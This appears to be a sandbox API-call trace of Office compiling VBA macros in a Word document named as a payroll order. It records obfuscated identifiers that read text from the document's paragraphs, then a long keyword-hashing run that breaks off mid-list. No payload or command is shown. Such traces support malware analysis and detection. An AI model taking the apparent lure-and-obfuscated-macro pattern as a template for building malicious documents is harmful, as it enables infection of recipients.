[0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] atoi (_Str="48") returned 48 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ElseIf") returned 0x10f307 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.098] atoi (_Str="65") returned 65 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] atoi (_Str="70") returned 70 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Then") returned 0x10b933 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.098] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.098] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.099] atoi (_Str="55") returned 55 [0045.099] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Else") returned 0x103b56 [0045.099] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.099] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="tmpPart" | out: _Dst="tmpPart") returned 0x0 [0045.099] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tmpPart") returned 0x105c69 [0045.099] atoi (_Str="81") returned 81 [0045.100] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.100] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.100] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="GetCorrPart" | out: _Dst="GetCorrPart") returned 0x0 [0045.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33f0272, cbMultiByte=5, lpWideCharStr=0x27651d8, cchWideChar=5 | out: lpWideCharStr="Duram") returned 5 [0045.100] atoi (_Str="139") returned 139 [0045.100] strcpy_s (in: _Dst=0x7fee406ea60, _DstSize=0x100, _Src="Von1" | out: _Dst="Von1") returned 0x0 [0045.100] atoi (_Str="36") returned 36 [0045.101] atoi (_Str="30") returned 30 [0045.101] atoi (_Str="41") returned 41 [0045.101] atoi (_Str="2") returned 2 [0045.101] atoi (_Str="0") returned 0 [0045.106] IMalloc:Realloc (This=0x7feff045380, pv=0x81f5ba0, cb=0x1300) returned 0x81f6d40 [0045.107] strcpy_s (in: _Dst=0x7fee406efc0, _DstSize=0x100, _Src="Duram" | out: _Dst="Duram") returned 0x0 [0045.107] atoi (_Str="79") returned 79 [0045.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x30d2f0a, cbMultiByte=5, lpWideCharStr=0x27651d8, cchWideChar=5 | out: lpWideCharStr="Yobna") returned 5 [0045.107] atoi (_Str="100") returned 100 [0045.107] CExposedStream::Read () returned 0x0 [0045.107] CExposedStream::Read () returned 0x0 [0045.107] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Ass") returned 0x107531 [0045.107] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GMO") returned 0x109465 [0045.107] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Run") returned 0x10d05f [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.108] atoi (_Str="3") returned 3 [0045.108] atoi (_Str="2") returned 2 [0045.108] atoi (_Str="3") returned 3 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.108] atoi (_Str="3") returned 3 [0045.108] atoi (_Str="2") returned 2 [0045.108] atoi (_Str="5") returned 5 [0045.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.109] atoi (_Str="3") returned 3 [0045.109] atoi (_Str="2") returned 2 [0045.109] atoi (_Str="7") returned 7 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.109] atoi (_Str="3") returned 3 [0045.109] atoi (_Str="2") returned 2 [0045.109] atoi (_Str="8") returned 8 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.109] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.109] atoi (_Str="3") returned 3 [0045.109] atoi (_Str="2") returned 2 [0045.110] atoi (_Str="9") returned 9 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.110] atoi (_Str="3") returned 3 [0045.110] atoi (_Str="2") returned 2 [0045.110] atoi (_Str="10") returned 10 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.110] atoi (_Str="3") returned 3 [0045.110] atoi (_Str="2") returned 2 [0045.110] atoi (_Str="11") returned 11 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.110] atoi (_Str="3") returned 3 [0045.110] atoi (_Str="2") returned 2 [0045.110] atoi (_Str="12") returned 12 [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GutDicSher65") returned 0x100e66 [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ActiveDocument") returned 0x105cd3 [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Paragraphs") returned 0x1066f9 [0045.111] atoi (_Str="3") returned 3 [0045.111] atoi (_Str="2") returned 2 [0045.111] atoi (_Str="13") returned 13 [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Range") returned 0x100cda [0045.111] atoi (_Str="111") returned 111 [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="If") returned 0x105da8 [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="End") returned 0x1089cd [0045.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Function") returned 0x107810 [0045.111] CExposedStream::Read () returned 0x0 [0045.111] IMalloc:Realloc (This=0x7feff045380, pv=0x81f2cb0, cb=0x7b0) returned 0x81f2cb0 [0045.111] CExposedStream::Release () returned 0x1 [0045.111] CExposedStream::Release () returned 0x0 [0045.112] CExposedStream::Release () returned 0x0 [0045.112] IMalloc:Free (This=0x7feff045380, pv=0x813ce30) [0045.112] IMalloc:Free (This=0x7feff045380, pv=0x813ae00) [0045.112] IMalloc:Free (This=0x7feff045380, pv=0x81d9f70) [0045.112] IMalloc:Free (This=0x7feff045380, pv=0x81d7f40) [0045.112] CExposedStream::Seek () returned 0x80030102 [0045.112] CExposedStream::Release () returned 0x0 [0045.112] IMalloc:Free (This=0x7feff045380, pv=0x8127e80) [0045.112] lstrcpyA (in: lpString1=0x25a7a7c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0045.112] CExposedDocFile::Stat () returned 0x0 [0045.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x25a7a7c, cbMultiByte=-1, lpWideCharStr=0x2075e0, cchWideChar=8 | out: lpWideCharStr="PROJECT") returned 8 [0045.112] CExposedDocFile::OpenStream () returned 0x0 [0045.112] CExposedDocFile::AddRef () returned 0x3 [0045.112] CExposedStream::Stat () returned 0x0 [0045.112] CExposedStream::Read () returned 0x0 [0045.112] lstrlenA (lpString="") returned 0 [0045.112] lstrcpyA (in: lpString1=0x836df50, lpString2="" | out: lpString1="") returned="" [0045.113] lstrlenA (lpString="") returned 0 [0045.113] lstrcpyA (in: lpString1=0x836df90, lpString2="" | out: lpString1="") returned="" [0045.113] lstrcpynA (in: lpString1=0x25a8aa0, lpString2="Host Extender Info", iMaxLength=256 | out: lpString1="Host Extender Info") returned="Host Extender Info" [0045.113] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0045.113] lstrcpyA (in: lpString1=0x25a8ce0, lpString2="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" | out: lpString1="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000" [0045.114] lstrcpynA (in: lpString1=0x25a8d40, lpString2="Workspace", iMaxLength=256 | out: lpString1="Workspace") returned="Workspace" [0045.114] lstrlenA (lpString="26, 26, 1316, 667, ") returned 19 [0045.114] lstrcpyA (in: lpString1=0x25a8f80, lpString2="26, 26, 1316, 667, " | out: lpString1="26, 26, 1316, 667, ") returned="26, 26, 1316, 667, " [0045.114] lstrlenA (lpString="78, 78, 1368, 719, Z") returned 20 [0045.114] lstrcpyA (in: lpString1=0x25a9100, lpString2="78, 78, 1368, 719, Z" | out: lpString1="78, 78, 1368, 719, Z") returned="78, 78, 1368, 719, Z" [0045.114] CExposedDocFile::OpenStream () returned 0x0 [0045.114] CExposedStream::Stat () returned 0x0 [0045.114] CExposedStream::Read () returned 0x0 [0045.114] CExposedStream::Release () returned 0x0 [0045.114] lstrcpyA (in: lpString1=0x836df70, lpString2="" | out: lpString1="") returned="" [0045.115] lstrcmpiA (lpString1="Loi1", lpString2="Loi1") returned 0 [0045.115] lstrlenA (lpString="Loi1") returned 4 [0045.115] lstrcpyA (in: lpString1=0x836dfb0, lpString2="" | out: lpString1="") returned="" [0045.115] lstrcmpiA (lpString1="HHlau", lpString2="HHlau") returned 0 [0045.115] lstrlenA (lpString="HHlau") returned 5 [0045.115] lstrlenA (lpString="") returned 0 [0045.115] lstrcpyA (in: lpString1=0x25a9d90, lpString2="" | out: lpString1="") returned="" [0045.115] atoi (_Str="393222000") returned 393222000 [0045.115] lstrcpynA (in: lpString1=0x836cb2c, lpString2="{6843B753-907B-449B-ABB3-CC551DD16349}", iMaxLength=39 | out: lpString1="{6843B753-907B-449B-ABB3-CC551DD16349}") returned="{6843B753-907B-449B-ABB3-CC551DD16349}" [0045.115] StringFromGUID2 (in: rguid=0x7fee40278a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lpsz=0x3d7e6f8, cchMax=39 | out: lpsz="{00000000-0000-0000-0000-000000000000}") returned 39 [0045.115] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{6843B753-907B-449B-ABB3-CC551DD16349}") returned -1 [0045.115] lstrlenA (lpString="{6843B753-907B-449B-ABB3-CC551DD16349}") returned 38 [0045.115] lstrlenA (lpString="{6843B753-907B-449B-ABB3-CC551DD16349}") returned 38 [0045.116] lstrlenA (lpString="{6843B753-907B-449B-ABB3-CC551DD16349}") returned 38 [0045.116] CExposedStream::Commit () returned 0x0 [0045.117] CExposedStream::Release () returned 0x0 [0045.117] CExposedDocFile::OpenStream () returned 0x80030002 [0045.117] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0045.117] lstrlenA (lpString="&H00000001") returned 10 [0045.117] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0045.117] lstrcmpiA (lpString1="&H00000001", lpString2="&H00000001") returned 0 [0045.117] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0045.118] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0045.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x836df50, cbMultiByte=-1, lpWideCharStr=0x207610, cchWideChar=39 | out: lpWideCharStr="{3832D640-CF90-11CF-8E43-00A0C911005A}") returned 39 [0045.118] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-00A0C911005A}", pclsid=0x25a7bcc | out: pclsid=0x25a7bcc*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a))) returned 0x0 [0045.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x836df77, cbMultiByte=-1, lpWideCharStr=0x207600, cchWideChar=4 | out: lpWideCharStr="VBE") returned 4 [0045.118] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x277acb8, cbMultiByte=5, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0045.118] SysStringByteLen (bstr="牕慢3") returned 0x5 [0045.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x277acb8, cbMultiByte=6, lpWideCharStr=0x7e02308, cchWideChar=6 | out: lpWideCharStr="Urba3") returned 6 [0045.118] lstrlenA (lpString="Urba3") returned 5 [0045.118] GetCurrentThreadId () returned 0x94c [0045.119] GetCurrentThreadId () returned 0x94c [0045.119] IMalloc:Alloc (This=0x7feff045380, cb=0x28) returned 0x7dff0c0 [0045.119] GetCursorPos (in: lpPoint=0x2077e0 | out: lpPoint=0x2077e0*(x=571, y=137)) returned 1 [0045.119] GetCapture () returned 0x0 [0045.119] WindowFromPoint (Point=0x890000023b) returned 0x201c6 [0045.119] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x94c [0045.119] SendMessageA (hWnd=0x201c6, Msg=0x84, wParam=0x0, lParam=0x89023b) returned 0x1 [0045.119] SendMessageA (hWnd=0x201c6, Msg=0x20, wParam=0x201c6, lParam=0x2000001) returned 0x1 [0045.123] SetCursor (hCursor=0x10007) returned 0x10007 [0045.124] GetCurrentThreadId () returned 0x94c [0045.124] GetCurrentThreadId () returned 0x94c [0045.125] CExposedDocFile::CreateStorage () returned 0x0 [0045.125] IMalloc:Alloc (This=0x7feff045380, cb=0x280) returned 0x80792c0 [0045.125] IMalloc:Alloc (This=0x7feff045380, cb=0x1738) returned 0x81f3470 [0045.125] GetLocalTime (in: lpSystemTime=0x207008 | out: lpSystemTime=0x207008*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x38c)) [0045.125] _ultow_s (in: _Value=0x5e399ea6, _Buffer=0x80792ea, _BufferCount=0x103, _Radix=16 | out: _Buffer="5e399ea6") returned 0x0 [0045.125] wcsncpy_s (in: _Destination=0x206cd0, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.125] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206c00, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.125] _wcsicmp (_String1="*\\Z035e399ea6", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\Order_Payroll_81154032.doc") returned 23 [0045.125] wcscpy_s (in: _Destination=0x814db00, _SizeInWords=0xe, _Source="*\\Z035e399ea6" | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.125] wcsncpy_s (in: _Destination=0x206d10, _SizeInWords=0x108, _Source="*\\Z035e399ea6", _MaxCount=0x106 | out: _Destination="*\\Z035e399ea6") returned 0x0 [0045.125] CharLowerBuffW (in: lpsz="*\\Z035e399ea6", cchLength=0xd | out: lpsz="*\\z035e399ea6") returned 0xd [0045.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035e399ea6", cchWideChar=14, lpMultiByteStr=0x206c40, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035e399ea6", lpUsedDefaultChar=0x0) returned 14 [0045.125] CExposedDocFile::AddRef () returned 0x2 [0045.126] CExposedDocFile::AddRef () returned 0x2 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x84) returned 0x811c0e0 [0045.126] wcscpy_s (in: _Destination=0x811c150, _SizeInWords=0x7, _Source="__SRP_" | out: _Destination="__SRP_") returned 0x0 [0045.126] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x180) returned 0x818c6d0 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff250 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0xb8) returned 0x26ff190 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd6730 [0045.126] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x80) returned 0x811c200 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd6980 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x230) returned 0x7fd6bd0 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x28) returned 0x7dfef40 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x10) returned 0x7d0c940 [0045.126] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x20697c, cchData=6 | out: lpLCData="1252") returned 5 [0045.126] atoi (_Str="1252") returned 1252 [0045.126] GetLocalTime (in: lpSystemTime=0x206970 | out: lpSystemTime=0x206970*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x3, wDay=0x6, wHour=0x10, wMinute=0x29, wSecond=0xa, wMilliseconds=0x38c)) [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c290 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075240 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c320 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x20) returned 0x7dfef70 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x80) returned 0x811c3b0 [0045.126] IMalloc:Realloc (This=0x7feff045380, pv=0x811c3b0, cb=0x280) returned 0x8079550 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8075300 [0045.126] IMalloc:Alloc (This=0x7feff045380, cb=0x0) returned 0x8188260 [0045.126] VirtualAlloc (lpAddress=0x0, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x3900000 [0045.127] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x2000, flProtect=0x4) returned 0x3910000 [0045.128] CExposedDocFile::CreateStream () returned 0x0 [0045.128] IMalloc:Alloc (This=0x7feff045380, cb=0x420) returned 0x81f8050 [0045.128] CExposedStream::AddRef () returned 0x2 [0045.128] CExposedStream::Release () returned 0x1 [0045.128] CExposedStream::Release () returned 0x0 [0045.128] IMalloc:Free (This=0x7feff045380, pv=0x81f8050) [0045.128] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0045.128] IMalloc:Realloc (This=0x7feff045380, pv=0x0, cb=0x30) returned 0x7d555d0 [0045.128] VirtualAlloc (lpAddress=0x0, dwSize=0x3000, flAllocationType=0x1000, flProtect=0x4) returned 0x3950000 [0045.129] VirtualAlloc (lpAddress=0x3910000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x3910000 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Abs") returned 0x1072bc [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Access") returned 0x101d98 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AddressOf") returned 0x10e252 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Alias") returned 0x10bf6d [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="And") returned 0x107469 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Any") returned 0x10747a [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Append") returned 0x108f83 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Array") returned 0x109183 [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="As") returned 0x105c8d [0045.130] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Assert") returned 0x1096e9 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="B") returned 0x101059 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Base") returned 0x10afa9 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BF") returned 0x105ca5 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Binary") returned 0x1008a0 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Boolean") returned 0x10978e [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByRef") returned 0x1074ef [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Byte") returned 0x101a83 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ByVal") returned 0x1089c5 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Call") returned 0x10744b [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Case") returned 0x107547 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CBool") returned 0x104c74 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CByte") returned 0x106d3c [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CCur") returned 0x108050 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDate") returned 0x108dc3 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDec") returned 0x10834a [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDbl") returned 0x1082e4 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CDecl") returned 0x10a0b9 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ChDir") returned 0x10b2fb [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CInt") returned 0x109f65 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Circle") returned 0x103fd1 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLng") returned 0x10af63 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Close") returned 0x1005ab [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Compare") returned 0x10af82 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Const") returned 0x10517a [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CSng") returned 0x10d4d2 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CStr") returned 0x10d5bb [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir$") returned 0x10f7cc [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CurDir") returned 0x101bab [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVar") returned 0x10e307 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVDate") returned 0x10cfd6 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CVErr") returned 0x108902 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Currency") returned 0x10f106 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Database") returned 0x10eec7 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date$") returned 0x1031c7 [0045.131] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Date") returned 0x103b0a [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Debug") returned 0x10eaee [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Decimal") returned 0x1036dd [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Declare") returned 0x104a38 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefBool") returned 0x1091ad [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefByte") returned 0x10b275 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefCur") returned 0x10cc45 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDate") returned 0x10d2fc [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDec") returned 0x10cf3f [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefDbl") returned 0x10ced9 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefInt") returned 0x10eb5a [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLng") returned 0x10fb58 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefObj") returned 0x10096b [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefSng") returned 0x102088 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefStr") returned 0x102171 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefVar") returned 0x102ebd [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dim") returned 0x1083c4 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir$") returned 0x106567 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Dir") returned 0x1083c9 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Do") returned 0x105cf8 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DoEvents") returned 0x109634 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Double") returned 0x100d99 [0045.132] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Each") returned 